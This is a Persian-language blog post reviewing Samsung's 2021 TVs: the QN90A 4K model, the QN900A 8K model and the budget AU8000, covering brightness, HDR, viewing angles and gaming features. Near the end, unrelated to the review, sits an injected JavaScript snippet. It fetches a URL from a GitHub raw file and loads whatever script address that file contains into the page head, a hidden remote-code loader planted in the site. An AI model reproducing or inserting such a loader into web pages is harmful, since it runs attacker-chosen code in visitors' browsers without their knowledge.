دسته‌بندی نشده

بهترین تلویزیون های 2021 سامسونگ

بهترین تلویزیون فورکی 4K

تلویزیون کیولد QLED سامسونگ مدل QN90A  یکی از بهترین تلویزیون های این کمپانی با رزولوشن فورکی 4K می باشد. این تلویزیون از محصولات سری نئو کیولد است که نوع ارتقا یافته کیولد با استفاده از نور های پس زمینه mini LED می باشد. نوردهی موضعی local dimming در این تلویزیون بسیار عالی است و نسبت کنتراست و رنگ های مشکی فوق العاده عمیق می باشند. این تلویزیون 2021 زاویه دید بسیار گسترده تری از بیشتر تلویزیون های VA دارد. با زاویه دید گسترده این تلویزیون سامسونگ در زاویه های مختلف روشنایی دقیق و جزئیات کامل برای محتویات پخش می شوند. QN90A یکی از روشن ترین تلویزیون های موجود می باشد که می تواند هر شرایط نوری انعکاس تلویزیون را به خوبی کنترل کند.  به صورت چشمگیر روشنایی بالا در حالت HDR نیز به خوبی حفظ خواهد شد و با وجود رنج گسترده ای از رنگ هایی که روی ان ارائه می شود محتویات HDR جلوه ای بی نظبر خواهند داشت. ویژگی بسیار مناسب موجود در این تلویزیون پشتیبانی از قابلیت های گیمینگ مختلف است که می تواند گیمر ها را بسیار راضی و خشنود نگه دارد. پشتیبانی از VRR و سازگاری با G-SYNC و نرخ رفرش بالا 120 هرتز قابلیت های موجود برای انجام بازی های مختلف می باشد. این تلویزیون با اخرین کنسول های موجود در بازار سازگاری دارد و دارای حالت مخصوص Auto Low Latency  و پورت HDMI 2.1 می باشد. علاوه بر این با تاخیر ورودی کم و پاسخگویی سریع QN90A  بسیار مناسب برای نمایش فیلم های اکشن و تصاویر پر سرعت بدون تاری و سایه می باشد.  

بهترین تلویزیون 8K

تلویزیون QLED کیولد QN900A بهترین تلویزیون سامسونگ با کیفیت تصویر بسیار بالا 8K می باشد. در این تلویزیون تقریبا همان ویژگی های  QN90A استفاده شده است و همانند ان از نور های پس زمینه mini LED و قابلیت VRR پشتیبانی می شود. این تلویزیون به طور کلی تلویزیونی عالی است اما به سطح QN90A نمی رسد و درکل برای تماشا محتویات 8K موجود کارایی عالی دارد. در این تلویزیون از پنل VA با زاویه دید گسترده استفاده شده است. نوردهی موضعی لوکال دیمینگ به عمق بیشتر محتویات تاریک و کنتراست بالا تر ان ها کمک می کند. این تلویزیون به دلیل کنترل بالایی که روی انعکاس نور دارد بسیار مناسب و کاربردی جهت استفاده در اتاق های روشن و پر نور می باشد. در حالت HDR نیز این تلویزیون روشنایی مناسب و رنج رنگ های گسترده ای دارد. محتویات HDR به حالت طبیعی و دقیقا مانند تصور سازنده پخش می شوند. در این تلویزیون محتویات کم کیفیت و دارای رزولوشن پایین نیز به خوبی ارتقا داده می شوند اما محتویات فورکی بر روی تلویزیون های 4K جلوه و کوالتی بهتری دارند. 

بهترین تلویزیون اقتصادی

تلویزیون اسمارت AU8000 سامسونگ محصولی اقتصادی با قیمت مناسب و کاملا بصرفه می باشد. این تلویزیون با ویژگی Crystal UHD ارائه شده در سال 2021 با قابلیت های مناسب عرضه شده است اما از ویژگی ها مدل های بالا رده برخوردار نمی باشد. برای این تلویزیون رنج گسترده ای از اندازه ها از 43 اینچ تا 85 اینچ مناسب برای سالن های مختلف استفاده شده است. AU8000 دارای پنل  VA با نسبت کنتراست عالی برای نمایش محتویات تیره می باشد اما از لوکال دیمینگ برای تقویت و بهتر کردن ان روی پنل پشتیبانی نمی شود. اگر می خواهید از این تلویزیون در اتاق های دارای نور متوسط استفاده کنید شاهد کنترل انعکاس عالی برای پنل ان خواهید بود. با وجود پشتیبانی از حالت های مختلف HDR 10 و HDR10+ این تلویزیون عملکردی مناسب در پخش محتوا HDR ندارد و در پخش رنگ های گسترده چندان موفق نمی باشد و نمی تواند به اندازه کافی و مناسب جزئیات موجود روی محتوا HDR را پخش کند. پنل این تلویزیون به 60 هرتز محدود شده است و قابلیت های گیمینگ رده بالا مانند تکنولوژی VRR روی ان پشتیبانی نمی شود اما با وجود تاخیر ورودی پایین مناسب برای انجام بازی های ساده و معمولی می باشد. تعبیه پلتفرم تایزن با کارکرد اسان و اپلیکیشن های متنوع از قابلیت های ویژه ان می باشد. امکان کنترل صوتی با استفاده از ریموت کنترل نیز برای این تلویزیون 2021 سامسونگ فراهم می باشد. درکل می توان گفت تلویزیون AU8000 در رده تلویزیون های قیمت مناسب گزینه مناسب و کاملا کاربردی می باشد. 

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *